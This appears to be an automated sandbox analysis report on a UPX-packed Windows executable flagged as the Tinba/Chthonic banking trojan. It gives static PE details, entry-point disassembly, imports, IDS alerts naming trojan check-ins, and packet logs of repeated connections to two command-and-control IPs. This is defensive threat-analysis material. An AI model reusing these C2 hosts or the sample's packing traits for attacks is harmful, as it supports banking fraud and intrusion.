                                                                                                                                                              TLSH:71B34B62F204E88BE817D8F69919CD3168A33DBD4890855E32D97F6D58B3AD30459F0F
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...,9TT...........................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:d08c8e8ea2868a54

                                                                                                                                                              Static PE Info

                                                                                                                                                              General

                                                                                                                                                              Entrypoint:0x405a80
                                                                                                                                                              Entrypoint Section:UPX0
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows cui
                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x5454392C [Sat Nov 1 01:36:44 2014 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:d39aa71a62356d5bd05b3ccf2dfedd9e

                                                                                                                                                              Entrypoint Preview

                                                                                                                                                              Instruction
                                                                                                                                                              push ebp
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              push ebx
                                                                                                                                                              push esi
                                                                                                                                                              sub esp, 38h
                                                                                                                                                              mov dword ptr [ebp-10h], 00000000h
                                                                                                                                                              mov eax, dword ptr [ebp-10h]
                                                                                                                                                              mov dword ptr [ebp-2Ch], 00000001h
                                                                                                                                                              mov ecx, dword ptr [ebp-2Ch]
                                                                                                                                                              mov dword ptr [ebp-20h], 00000000h
                                                                                                                                                              mov word ptr [ebp-22h], 2D5Bh
                                                                                                                                                              mov edx, dword ptr [ebp-20h]
                                                                                                                                                              mov dword ptr [ebp-28h], 00000007h
                                                                                                                                                              mov esi, dword ptr [ebp-28h]
                                                                                                                                                              mov byte ptr [ebp-2Dh], 00000052h
                                                                                                                                                              mov bl, byte ptr [ebp-2Dh]
                                                                                                                                                              mov word ptr [ebp-30h], 796Dh
                                                                                                                                                              mov byte ptr [ebp-09h], bl
                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                              mov dword ptr [0040DD44h], eax
                                                                                                                                                              lea eax, dword ptr [ebp+04h]
                                                                                                                                                              mov dword ptr [0040DD48h], eax
                                                                                                                                                              mov dword ptr [esp], esi
                                                                                                                                                              mov dword ptr [ebp-34h], eax
                                                                                                                                                              mov dword ptr [ebp-38h], ecx
                                                                                                                                                              mov dword ptr [ebp-3Ch], edx
                                                                                                                                                              call 00007F5D907FB55Eh
                                                                                                                                                              mov ecx, dword ptr [ebp-3Ch]
                                                                                                                                                              cmp eax, ecx
                                                                                                                                                              je 00007F5D907FB99Eh
                                                                                                                                                              mov ax, 0000h
                                                                                                                                                              mov cx, word ptr [ebp-30h]
                                                                                                                                                              mov dx, ax
                                                                                                                                                              sub dx, word ptr [ebp-30h]
                                                                                                                                                              mov word ptr [ebp-30h], dx
                                                                                                                                                              sub ax, word ptr [ebp-30h]
                                                                                                                                                              or cx, 1256h
                                                                                                                                                              mov word ptr [ebp-30h], cx
                                                                                                                                                              mov word ptr [ebp-22h], ax
                                                                                                                                                              mov esi, dword ptr [ebp-38h]
                                                                                                                                                              mov dword ptr [ebp-14h], esi
                                                                                                                                                              jmp 00007F5D907FB984h
                                                                                                                                                              mov ax, 0000h
                                                                                                                                                              mov ecx, dword ptr [ebp-34h]
                                                                                                                                                              mov dword ptr [ebp-14h], ecx
                                                                                                                                                              sub ax, word ptr [ebp-22h]
                                                                                                                                                              mov word ptr [ebp-22h], ax
                                                                                                                                                              mov eax, dword ptr [ebp-14h]
                                                                                                                                                              mov cx, word ptr [ebp-22h]
                                                                                                                                                              and cx, 0673h
                                                                                                                                                              mov word ptr [ebp-22h], cx
                                                                                                                                                              add esp, 38h
                                                                                                                                                              pop esi
                                                                                                                                                              pop ebx
                                                                                                                                                              pop ebp
                                                                                                                                                              ret
                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                              Rich Headers

                                                                                                                                                              Programming Language:
                                                                                                                                                              • [ASM] VS2005 build 50727
                                                                                                                                                              • [ C ] VS2005 build 50727
                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                              • [C++] VS2005 build 50727
                                                                                                                                                              • [RES] VS2005 build 50727
                                                                                                                                                              • [LNK] VS2005 build 50727

                                                                                                                                                              Data Directories

                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1d0000x8c.imports
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x638.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                              Sections

                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              UPX00x10000x100000xf600False0.4557768038617886DOS executable (COM)4.895667733918766IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              UPX10x110000xb0000xaa00False0.3551470588235294data5.65815268907495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc0x1c0000x10000x800False0.41162109375data3.379567063767855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .imports0x1d0000x10000xc00False0.421875data4.436376811230836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                              Resources

                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_ICON0x112280x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.21890243902439024
                                                                                                                                                              RT_ICON0x118a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.3400537634408602
                                                                                                                                                              RT_ICON0x11b980x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 00.35450819672131145
                                                                                                                                                              RT_ICON0x11d900x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.46283783783783783
                                                                                                                                                              RT_ICON0x11ec80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5026652452025586
                                                                                                                                                              RT_ICON0x12d800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5798736462093863
                                                                                                                                                              RT_ICON0x136380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.40264976958525345
                                                                                                                                                              RT_ICON0x13d100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.3273121387283237
                                                                                                                                                              RT_ICON0x142880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.27344398340248965
                                                                                                                                                              RT_ICON0x168400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.37875234521575984
                                                                                                                                                              RT_ICON0x178f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.37868852459016394
                                                                                                                                                              RT_ICON0x182900x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.4796099290780142
                                                                                                                                                              RT_GROUP_ICON0x187080xaedata0.5977011494252874
                                                                                                                                                              RT_VERSION0x1c2fc0x33cdata0.47342995169082125

                                                                                                                                                              Imports

                                                                                                                                                              DLLImport
                                                                                                                                                              GDI32.dllGetDeviceCaps
                                                                                                                                                              KERNEL32.DLLAddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess
                                                                                                                                                              WINMM.dlltimeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW
                                                                                                                                                              mscms.dllGetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference
                                                                                                                                                              msvcrt.dlliswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat
                                                                                                                                                              ole32.dllOleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              192.168.2.4216.218.185.16249742802020418 01/20/24-20:41:48.295231TCP2020418ET TROJAN Tinba Checkin 24974280192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249742802830613 01/20/24-20:41:48.295231TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974280192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249738802830613 01/20/24-20:41:42.359145TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973880192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249738802024659 01/20/24-20:41:42.359145TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973880192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249743802830613 01/20/24-20:41:49.827227TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974380192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249738802020418 01/20/24-20:41:42.359145TCP2020418ET TROJAN Tinba Checkin 24973880192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249739802020418 01/20/24-20:41:43.842659TCP2020418ET TROJAN Tinba Checkin 24973980192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249739802024659 01/20/24-20:41:43.842659TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973980192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249741802024659 01/20/24-20:41:46.905610TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974180192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249735802020418 01/20/24-20:41:33.804089TCP2020418ET TROJAN Tinba Checkin 24973580192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249740802020418 01/20/24-20:41:45.528112TCP2020418ET TROJAN Tinba Checkin 24974080192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249735802024659 01/20/24-20:41:33.804089TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973580192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4178.62.201.3449736802024659 01/20/24-20:41:39.347423TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973680192.168.2.4178.62.201.34
                                                                                                                                                              192.168.2.4216.218.185.16249737802020418 01/20/24-20:41:40.938841TCP2020418ET TROJAN Tinba Checkin 24973780192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249740802024659 01/20/24-20:41:45.528112TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974080192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249743802024659 01/20/24-20:41:49.827227TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974380192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249741802020418 01/20/24-20:41:46.905610TCP2020418ET TROJAN Tinba Checkin 24974180192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249743802020418 01/20/24-20:41:49.827227TCP2020418ET TROJAN Tinba Checkin 24974380192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249742802024659 01/20/24-20:41:48.295231TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974280192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4216.218.185.16249739802830613 01/20/24-20:41:43.842659TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973980192.168.2.4216.218.185.162
                                                                                                                                                              192.168.2.4178.62.201.3449736802020418 01/20/24-20:41:39.347423TCP2020418ET TROJAN Tinba Checkin 24973680192.168.2.4178.62.201.34
                                                                                                                                                              192.168.2.4216.218.185.16249737802024659 01/20/24-20:41:40.938841TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973780192.168.2.4216.218.185.162

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 20, 2024 20:40:49.999314070 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:40:59.608702898 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:12.790848017 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:12.792475939 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:12.792515039 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:12.792593002 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:12.793143988 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:12.793160915 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:13.093056917 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:13.124512911 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:13.124597073 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:13.702439070 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.905580044 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.931662083 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.931703091 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:14.932826042 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:14.932955027 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.939837933 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.940105915 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:14.960537910 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:14.960589886 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:15.289644003 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:15.289729118 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:15.289983988 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:15.290144920 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:15.290208101 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:15.293447018 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:15.293472052 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:15.293487072 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:15.294157028 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:17.311801910 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:22.124315023 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:31.733712912 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                              Jan 20, 2024 20:41:33.405186892 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:33.559664011 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:33.559739113 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:33.804089069 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:33.958657980 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:33.960119963 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:34.114711046 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:34.114938974 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:34.114959955 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:34.115211010 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:34.197063923 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:34.351465940 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.142398119 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:39.344611883 CET8049736178.62.201.34192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.344835043 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:39.347423077 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:39.548655987 CET8049736178.62.201.34192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.548875093 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:39.750291109 CET8049736178.62.201.34192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.847723007 CET8049736178.62.201.34192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.848390102 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:39.848390102 CET4973680192.168.2.4178.62.201.34
                                                                                                                                                              Jan 20, 2024 20:41:40.049669027 CET8049736178.62.201.34192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:40.781498909 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:40.938597918 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:40.938769102 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:40.938841105 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:41.093322039 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.093404055 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:41.247828007 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.248694897 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.248708963 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.248930931 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:41.249335051 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:41.403767109 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.203521967 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.358956099 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.359042883 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.359144926 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.514241934 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.514324903 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.669533014 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.669940948 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.669955015 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.670139074 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.670442104 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:42.825643063 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:43.687911034 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:43.842346907 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:43.842545033 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:43.842658997 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:43.996819973 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:43.996901035 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:44.151101112 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:44.151778936 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:44.151809931 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:44.151974916 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:44.152224064 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:44.306319952 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.281513929 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.435940027 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.436049938 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.528111935 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.682406902 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.682504892 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.836764097 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.837436914 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.837450027 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.837616920 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.841912985 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:45.996149063 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:46.749911070 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:46.905324936 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:46.905608892 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:46.905610085 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.060825109 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.060883045 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.216280937 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.216798067 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.216813087 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.217039108 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.217381954 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.372519016 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.140640974 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.295020103 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.295171976 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.295231104 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.449454069 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.449649096 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.603910923 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604362965 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604379892 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604687929 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.604973078 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.759226084 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.671741009 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.827025890 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.827136040 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.827227116 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.982502937 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.982614040 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:50.138786077 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140456915 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140474081 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140702009 CET4974380192.168.2.4216.218.185.162
